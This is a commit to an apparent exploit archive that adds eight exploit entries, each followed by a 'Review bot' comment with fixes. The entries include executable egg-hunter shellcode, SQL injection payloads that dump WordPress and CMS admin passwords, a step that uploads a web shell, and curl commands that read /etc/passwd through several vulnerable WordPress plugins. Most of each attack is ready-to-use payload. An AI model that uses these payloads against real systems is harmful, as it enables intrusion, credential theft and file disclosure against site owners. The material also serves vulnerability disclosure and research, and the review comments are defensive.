DB: 2015-08-11
8 new exploits
parent
b6cfc9b565
commit
6bd95eb0eb
9 changed files with 278 additions and 0 deletions
@ -34034,6 +34034,8 @@ id,file,description,date,author,platform,type,port
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
@ -34062,7 +34064,13 @@ id,file,description,date,author,platform,type,port
37732,platforms/win32/local/37732.c,"Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
37747,platforms/windows/dos/37747.py,"Havij Pro - Crash POC",2015-08-10,i_7e1,windows,dos,0
37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
37741,platforms/osx/dos/37741.txt,"OSX Keychain - EXC_BAD_ACCESS DoS",2015-08-08,"Juan Sacco",osx,dos,0
37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
37744,platforms/php/webapps/37744.txt,"WordPress Video Gallery 2.7 SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0
37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
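--- a/platforms/lin_x86/shellcode/37749.c
+++ b/platforms/lin_x86/shellcode/37749.c
@@ -0,0 +1,63 @@
+/*
+Title: Linux x86 Egg Hunter Shellcode (19 bytes)
+Date: 4 August 2015
+Author: Guillaume Kaddouch
+Website: http://networkfilter.blogspot.com
+Twitter: @gkweb76
+Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86
+
+This code was created as an exercise for the SecurityTube Linux Assembly Expert (SLAE).
+
+Egg signature = 0x50905090 (push eax, nop, push eax, nop)
+Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because the first address check could match the hardcoded egg signature in
+the egg hunter itself. As we do not store hardcoded egg signature below, it allows us to check only 4 bytes once.
+
+egg-hunter.asm:
+----------------
+
+global _start
+
+section .text
+
+_start:
+mov eax, addr ; retrieve a valid address (shorter than using JMP CALL POP)
+mov ebx, dword 0x5090508f ; egg signature altered: 0x50905090 - 1
+inc ebx ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature)
+
+next_addr:
+inc eax ; increasing memory address to look at next address
+cmp dword [eax], ebx ; check if our egg is at that memory address, if yes set ZF = 1
+jne next_addr ; if ZF = 0 (check failed), then jump to next_addr to check next address
+jmp eax ; we found our egg (ZF = 1), jump at this address
+
+addr: db 0x1
+*/
+
+/*
+myegg.c:
+-----------
+Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+// Egg hunter 19 bytes (\x00 \x0a \x0d free)
+unsigned char egghunter[] = \
+"\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75"
+"\xfb\xff\xe0\x01";
+
+// Print 'Egg Found!!' on screen
+// You can swap it out with any shellcode you like (as long as you keep the egg mark)
+unsigned char shellcode[] = \
+"\x90\x50\x90\x50" // egg mark
+"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
+"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
+"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";
+
+main()
+{
+printf("Egg hunter shellcode Length: %d\n", strlen(egghunter));
+int (*ret)() = (int(*)())egghunter;
+ret();
+}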
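Review bot: `main()` on line 58 relies on implicit `int`, which C99 and later reject, and the `printf` on line 60 passes a `size_t` from `strlen` to `%d`, which is undefined behaviour and is flagged by `-Wformat`; the harness should read `int main(void)` and `printf("Egg hunter shellcode Length: %zu\n", strlen(egghunter));`. Line 61 converts an object pointer to a function pointer, which C does not guarantee to be meaningful, so the header comment should state explicitly that this only works as a 32-bit, non-PIE, `-z execstack` build, which the compile line on line 39 implies but never says. The immediate baked into the first five bytes on line 47 (`\xb8\x72\x80\x04\x08`, the `mov eax, addr` from line 23) is an absolute text-segment address, so the same comment should warn that the hunter will not start scanning from a sensible place in a PIE binary. `strlen` is only a valid length here because neither byte string contains `\x00`, which the comment on line 45 asserts but nothing verifies; a `_Static_assert(sizeof egghunter == 20, "egg hunter length changed")` would catch an edit that breaks that assumption.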
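--- a/platforms/php/webapps/37744.txt
+++ b/platforms/php/webapps/37744.txt
@@ -0,0 +1,37 @@
+# Exploit Title: WordPress Video Gallery 2.7 SQL Injection
+# Date: 20-01-2015
+# Software Link: https://wordpress.org/plugins/contus-video-gallery/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+
+1. Description
+
+$_GET['vid'] is not escaped.
+
+google_adsense() is accessible for everyone.
+
+File: contus-video-gallery\hdflvvideoshare.php
+
+add_action('wp_ajax_googleadsense' ,'google_adsense');
+add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
+function google_adsense(){
+global $wpdb;
+$vid = $_GET['vid'];
+$google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
+$query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
+$google_adsense = unserialize($query);
+echo $google_adsense['googleadsense_code'];
+die();
+}
+
+http://security.szurek.pl/wordpress-video-gallery-27-sql-injection.html
+
+2. Proof of Concept
+
+http://wordpress-url/wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(48, 32, 85, 78, 73, 79, 78, 32, 83, 69, 76, 69, 67, 84, 32, 67, 79, 78, 67, 65, 84, 40, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 57, 55, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 56, 44, 32, 49, 50, 51, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 54, 44, 32, 53, 56, 44, 32, 51, 52, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 49, 49, 49, 44, 32, 49, 48, 51, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 57, 53, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 53, 57, 44, 32, 49, 49, 53, 44, 32, 53, 56, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 76, 69, 78, 71, 84, 72, 40, 117, 115, 101, 114, 95, 112, 97, 115, 115, 41, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 53, 56, 44, 32, 51, 52, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 117, 115, 101, 114, 95, 112, 97, 115, 115, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 51, 52, 44, 32, 53, 57, 44, 32, 49, 50, 53, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 41, 32, 70, 82, 79, 77, 32, 119, 112, 95, 117, 115, 101, 114, 115, 32, 87, 72, 69, 82, 69, 32, 73, 68, 32, 61, 32, 49) as CHAR)
+
+3. Solution:
+
+Update to version 2.8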
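Review bot: The Solution section on line 37 says only to update to 2.8 without stating what the fix has to contain, while the quoted handler builds both queries on lines 22–23 by concatenating `$vid` and `$google_adsense_id` into SQL; for defenders reading this the advisory should say that each query must go through `$wpdb->prepare()` with a `%d` placeholder, and that the unauthenticated hook on line 18 needs a capability or nonce check, since `$vid` is a numeric id and nothing about the handler needs to be anonymous. Line 24 also feeds a database value to `unserialize()`, a second issue (object injection if that column is ever attacker-influenced) that the Description does not mention. The hook name on line 18 is quoted as `wp_ajax_nonpriv_googleadsense`; WordPress's hook prefix is `wp_ajax_nopriv_`, so this looks like a transcription slip worth checking against the plugin source.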
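--- a/platforms/php/webapps/37750.txt
+++ b/platforms/php/webapps/37750.txt
@@ -0,0 +1,21 @@
+# ( In The Name Of ALLAH )
+# Exploit Title : WDS CMS - SQL Injection
+# Google Dork : allinurl:wds_news/article.php?ID=
+# Date : 2015-08-09
+# Exploit Author : Ismail Marzouk
+# Vendor Homepage : http://webdesignskolan.se/
+# Tested on : Windows 7
+
+Exploit : http://
+[Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin--
+
+Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file
+
+Shell Path : http://[Target]/wds_news/filer/shell.php
+
+
+# #### #### #### #### #### #### #### #### #
+# Facebook Profile : www.fb.com/ism.marzouk
+# #### #### #### #### #### #### #### #### #
+
+Good Luck ^__^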
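Review bot: The header block on lines 2–7 carries no affected-version and no vendor-notification field, so a reader cannot tell which WDS CMS releases are in scope or whether the vendor has been told; the other advisories in this commit use `Vendor Notified:` and a version in the title, and this one should do the same even if the value is "unknown". The vulnerable input is only recoverable by reading the payload on line 10 — the `ID` parameter of `wds_news/article.php`, which is evidently expected to be an integer — and a one-line Description stating that, plus the obvious fix (cast to int or use a prepared statement), would make the entry useful to someone patching rather than exploiting. Lines 12 and 14 name an admin file listing and a resulting path without saying what check is missing there; if that step depends on credentials obtained from the injection, the advisory should say so, otherwise it reads as a second, undocumented vulnerability.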
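--- a/platforms/php/webapps/37751.txt
+++ b/platforms/php/webapps/37751.txt
@@ -0,0 +1,24 @@
+Title: Remote file download vulnerability in wptf-image-gallery v1.03
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-07-17
+Download Site: https://wordpress.org/plugins/wptf-image-gallery
+Vendor: https://profiles.wordpress.org/sakush100/
+Vendor Notified: 0000-00-00
+Vendor Contact: plugins@wordpress.org
+Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it.
+Vulnerability:
+The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files:
+
+
+1 <?php
+2 error_reporting(0);
+3 $homepage = file_get_contents($_GET['url']);
+4 $homepage = str_replace("script", "mboxdisablescript", $homepage);
+5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage);
+6 echo $homepage;
+7 ?>
+
+CVEID:
+OSVDB:
+Exploit Code:
+• $ curl http://server/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd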
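Review bot: The advisory classifies this only as a file download, but the quoted line 3 of `ajax_load.php` passes `$_GET['url']` straight to `file_get_contents()`, which with `allow_url_fopen` enabled also fetches remote URLs, so the same endpoint is a server-side request forgery vector and the Title and Description should say so — that changes what a defender has to look for in logs and what the fix has to cover. The `str_replace` calls on lines 4–5 rewrite the literal word `script` and are not an output-encoding or input-validation step; a sentence noting that they must not be mistaken for a mitigation would help. `Vendor Notified: 0000-00-00` on line 6 is a placeholder; if the vendor was not contacted the advisory should state that explicitly rather than leave a null date.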
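--- a/platforms/php/webapps/37752.txt
+++ b/platforms/php/webapps/37752.txt
@@ -0,0 +1,31 @@
+Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-07-13
+Download Site: https://wordpress.org/plugins/recent-backups
+Vendor: https://profiles.wordpress.org/andycheeseman/
+Vendor Notified: 0000-00-00
+Vendor Contact: plugins@wordpress.org
+Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
+Vulnerability:
+The code in download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded. This vulnerability can be used
+to download sensitive system files:
+
+2 $file = $_GET['file_link'];
+3
+4 if (file_exists($file)) {
+5 header('Content-Description: File Transfer');
+6 header('Content-Type: application/octet-stream');
+7 header('Content-Disposition: attachment; filename='.basename($file));
+8 header('Content-Transfer-Encoding: binary');
+9 header('Expires: 0');
+10 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+11 header('Pragma: public');
+12 header('Content-Length: ' . filesize($file));
+13 ob_clean();
+14 flush();
+15 readfile($file);
+
+CVEID:
+OSVDB:
+Exploit Code:
+• $ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd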
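Review bot: The quoted snippet starts at line 2 with `$file = $_GET['file_link']` and nothing between there and `readfile($file)` on line 15 constrains the path or identifies the caller; the advisory should spell out the two-part fix a maintainer needs — resolve the requested name against the backup directory with `realpath()` and refuse anything outside it, and require an authenticated user with an appropriate capability before any header is sent — because `file_exists()` on line 4 is not a security check and a reader may take it for one. The curl example on the last line calls `wp-content/plugins/recent-backups/download-file.php` directly, which suggests the script runs without the WordPress bootstrap and therefore cannot call `current_user_can()` at all; if that is the case the advisory should say so, since it means the endpoint must be moved behind `admin-ajax.php` or `wp-load.php` rather than just patched in place. `Vendor Notified: 0000-00-00` on line 6 is a placeholder that should be a real date or "not notified".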
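--- a/platforms/php/webapps/37753.txt
+++ b/platforms/php/webapps/37753.txt
@@ -0,0 +1,43 @@
+Title: Remote file download in simple-image-manipulator v1.0 wordpress plugin
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-07-16
+Download Site: https://wordpress.org/plugins/simple-image-manipulator
+Vendor: https://profiles.wordpress.org/kevartpatel/
+Vendor Notified: 2015-07-16
+Vendor Contact: plugins@wordpress.org
+Description: Manipulate your wordpress images using slider and tickboxes.
+Vulnerability:
+In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location:
+
+
+14 /* Figure out the MIME type | Check in array */
+15 $known_mime_types=array(
+16 "pdf" => "application/pdf",
+17 "txt" => "text/plain",
+18 "html" => "text/html",
+19 "htm" => "text/html",
+20 "exe" => "application/octet-stream",
+21 "zip" => "application/zip",
+22 "doc" => "application/msword",
+23 "xls" => "application/vnd.ms-excel",
+24 "ppt" => "application/vnd.ms-powerpoint",
+25 "gif" => "image/gif",
+26 "png" => "image/png",
+27 "jpeg"=> "image/jpg",
+28 "jpg" => "image/jpg",
+29 "php" => "text/plain"
+30 );
+31
+32 if($mime_type==''){
+33 $file_extension = strtolower(substr(strrchr($file,"."),1));
+34 if(array_key_exists($file_extension, $known_mime_types)){
+35 $mime_type=$known_mime_types[$file_extension];
+36 } else {
+37 $mime_type="application/force-download";
+38 };
+39 };
+
+CVEID:
+OSVDB:
+Exploit Code:
+• curl -sk "http://server/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"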
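Review bot: The quoted excerpt (lines 14–39 of download.php) shows only MIME-type selection and never the statement that assigns `$file`, so the advisory does not actually show the unsanitised input its title refers to; the PoC on the last line names a `filepath` query parameter, and the line that reads it into `$file` should be quoted alongside, with one sentence stating that no authentication and no path restriction precede it. The mapping `"php" => "text/plain"` on line 29 deserves an explicit remark, since it means the endpoint will serve PHP source as plain text and so the missing path check exposes the site's own configuration, not just system files. Having shown the MIME table, the advisory should also say that an extension allowlist is not a fix here — the file location, not its type, is what needs to be constrained, with `realpath()` against an intended base directory plus a capability check.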
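--- a/platforms/php/webapps/37754.txt
+++ b/platforms/php/webapps/37754.txt
@@ -0,0 +1,34 @@
+Title: Remote file download vulnerability in candidate-application-form v1.0 wordpress plugin
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-07-12
+Download Site: https://wordpress.org/plugins/candidate-application-form
+Vendor: https://profiles.wordpress.org/flaxlandsconsulting/
+Vendor Notified: 2015-07-12
+Vendor Contact:
+Description: This plugin allows you to easily add a candidate application form to a job vacancy post, which allows the candidate to apply for the vacancy.
+Vulnerability:
+The code in downloadpdffile.php doesn't do any sanity checks, allowing a remote attacker to download sensitive system files:
+
+<?php
+2 $file_name = $_GET["fileName"];
+3 $path = $_GET["fileUrl"];
+4 $fullfile = $path.$file_name;
+5 if (file_exists('../../uploads/candidate_application_form/'.$file_name)) {
+6 header('Pragma: public'); // required
+7 header('Expires: 0'); // no cache
+8 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+9 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ('../../uploads/candidate_application_form/'.$file_ name)).' GMT');
+10 header('Cache-Control: private',false);
+11 header('Content-Type: '.'application/pdf');
+12 header('Content-Disposition: attachment; filename="'.basename('../../uploads/candidate_application_form/'.$file_ name).'"');
+13 header('Content-Transfer-Encoding: binary');
+14 header('Content-Length: '.filesize('../../uploads/candidate_application_form/'.$file_name)); // provide file size
+15 header('Connection: close');
+16 readfile('../../uploads/candidate_application_form/'.$file_name); // push it out
+17 exit();
+18 }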
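Review bot: The quoted snippet shows `$path = $_GET["fileUrl"]` and `$fullfile = $path.$file_name` on lines 3–4 that are never used afterwards, while every later call on lines 5–16 concatenates `$file_name` onto the fixed uploads directory; the advisory should say plainly that `fileName` alone is the traversable input and `fileUrl` is dead code, so that someone patching from this text fixes the right parameter. The fix worth stating is `basename()` on `$file_name` followed by a `realpath()` check that the result stays under the uploads directory, plus an authentication check before any header is sent. Lines 9 and 12 show `$file_ name` with an embedded space, which looks like a copy artifact rather than the plugin's code and should be corrected so the excerpt matches the source. `Vendor Contact:` on line 7 is empty; if no contact was found the line should say so.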
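--- a/platforms/windows/dos/37747.py
+++ b/platforms/windows/dos/37747.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python
+#Exploit Title:Havij Pro Crash POC
+# Tested:windows7
+#Sofrware Link:http://www.itsecteam.com/
+#Version:1.17
+#Email:i_7e1@outlook.com
+#Author:M1x7e1@Safeye Team
+#run python poc.py
+#copy content to target
+#click Analyze
+
+## EDB-Note: tested and verified using version 1.6 Pro
+
+content = “\x41” * 8000
+file = open(“xx.txt”,”w”)
+file.write(content)
+file.close()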
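Review bot: Lines 14–15 use typographic quotes (`“\x41”` and `“xx.txt”,”w”`), so the file as committed is a `SyntaxError` under any Python interpreter; they need to be plain ASCII `"` characters. The header states `#Version:1.17` on line 5 while the EDB note on line 12 reports verification against 1.6 Pro, so the affected-version line should be reconciled or both versions listed. Stylistically, `with open("xx.txt", "w") as f: f.write(content)` would replace lines 15–17 and close the handle on error as well, and `file` shadows the Python 2 builtin of the same name. The "Sofrware" typo on line 4 is in the header metadata and worth fixing at the same time.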